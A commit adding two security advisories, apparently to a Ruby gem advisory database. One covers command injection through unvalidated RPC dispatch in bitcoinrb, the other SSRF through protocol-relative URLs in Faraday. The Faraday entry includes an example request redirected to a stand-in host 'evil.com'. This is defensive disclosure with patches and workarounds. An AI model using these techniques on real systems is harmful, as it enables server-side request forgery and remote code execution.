GHSA SYNC: 2 brand new advisories (#991)

jasnow · web-flow · commit 826ac198fe00 · 2026-02-11T11:24:37.000-08:00
diff --git a/gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml b/gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml
@@ -0,0 +1,45 @@
+---
+gem: bitcoinrb
+ghsa: q66h-m87m-j2q6
+url: https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
+title: Bitcoinrb Vulnerable to Command injection via RPC
+date: 2026-02-10
+description: |
+  ### Summary: Remote Code Execution
+
+  Unsafe handling of request parameters in the RPC HTTP server
+  results in command injection.
+
+  ### Details
+
+  In lib/bitcoin/rpc/http_server.rb line 30-39, the JSON body of a
+  POST request is parsed into `command` and `args` variables. These
+  values are then passed to `send`, which is used to call an arbitrary
+  class method. However, there is no validation that the provided
+  `command` value  is one of the expected RPC methods.
+  This means that an attacker could supply a `command` value such
+  as `system`, and then pass arbitrary system commands into the
+  `args` parameter and achieve remote code execution.
+
+  ### Remediation
+
+   **Mitigating Factors:**
+
+  - The RPC server is part of the experimental SPV node feature,
+     which is not documented and has very few users.
+  - The SPV-related features may be removed in future releases.
+
+  **Resolution:**
+
+  - Added whitelist validation to allow only RPC methods defined
+    in `RequestHandler`.
+
+  - Fixed in version 1.12.0.
+patched_versions:
+  - ">= 1.12.0"
+related:
+  url:
+    - https://github.com/chaintope/bitcoinrb/releases/tag/v1.12.0
+    - https://github.com/chaintope/bitcoinrb/security/advisories/GHSA-q66h-m87m-j2q6
+    - https://github.com/chaintope/bitcoinrb/commit/070327133a2a3e5a6d265b2d82f06f9414c01e74
+    - https://github.com/advisories/GHSA-q66h-m87m-j2q6
diff --git a/gems/faraday/CVE-2026-25765.yml b/gems/faraday/CVE-2026-25765.yml
@@ -0,0 +1,75 @@
+---
+gem: faraday
+cve: 2026-25765
+ghsa: 33mh-2634-fwr2
+url: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
+title: Faraday affected by SSRF via protocol-relative URL host
+  override in build_exclusive_url
+date: 2026-02-09
+description: |
+  ### Impact
+
+  Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)
+  uses Ruby's `URI#merge` to combine the connection's base URL with
+  a user-supplied path. Per RFC 3986, protocol-relative URLs
+  (e.g. `//evil.com/path`) are treated as network-path references
+  that override the base URL's host/authority component.
+
+  This means that if any application passes user-controlled input to
+  Faraday's `get()`, `post()`, `build_url()`, or other request
+  methods, an attacker can supply a protocol-relative URL like
+  `//attacker.com/endpoint` to redirect the request to an
+  arbitrary host, enabling Server-Side Request Forgery (SSRF).
+
+  The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts
+  URLs starting with `/`, so protocol-relative URLs bypass it entirely.
+
+  **Example**
+  ```ruby
+  conn = Faraday.new(url: 'https://api.internal.com')
+  conn.get('//evil.com/steal')
+  # Request is sent to https://evil.com/steal instead of api.internal.com
+  ```
+
+  ### Patches
+
+  Faraday v2.14.1 is patched against this security issue. All
+  versions of Faraday up to 2.14.0 are affected.
+
+  ### Workarounds
+
+  **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action
+  to mitigate this issue, however should that not be an option
+  please continue reading.**
+
+  Applications should validate and sanitize any user-controlled
+  input before passing it to Faraday request methods.
+  Specifically:
+
+  - Reject or strip input that starts with // followed by a
+    non-/ character.
+  - Use an allowlist of permitted path prefixes.
+  - Alternatively, prepend ./ to all user-supplied paths before
+    passing them to Faraday.
+
+  Example validation:
+  ```ruby
+  def safe_path(user_input)
+    raise ArgumentError, "Invalid path" if user_input.match?(r{\A//[^/]})
+     user_input
+  end
+  ```
+cvss_v3: 5.8
+patched_versions:
+  - ">= 2.14.1"
+related:
+  url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25765
+    - https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
+    - https://github.com/lostisland/faraday/releases/tag/v2.14.1
+    - https://github.com/lostisland/faraday/pull/1569
+    - https://github.com/lostisland/faraday/commit/a6d3a3a0bf59c2ab307d0abd91bc126aef5561bc
+    - https://www.rfc-editor.org/rfc/rfc3986#section-5.2.2
+    - https://www.rfc-editor.org/rfc/rfc3986#section-5.4
+    - https://advisories.gitlab.com/pkg/gem/faraday/CVE-2026-25765
+    - https://github.com/advisories/GHSA-33mh-2634-fwr2
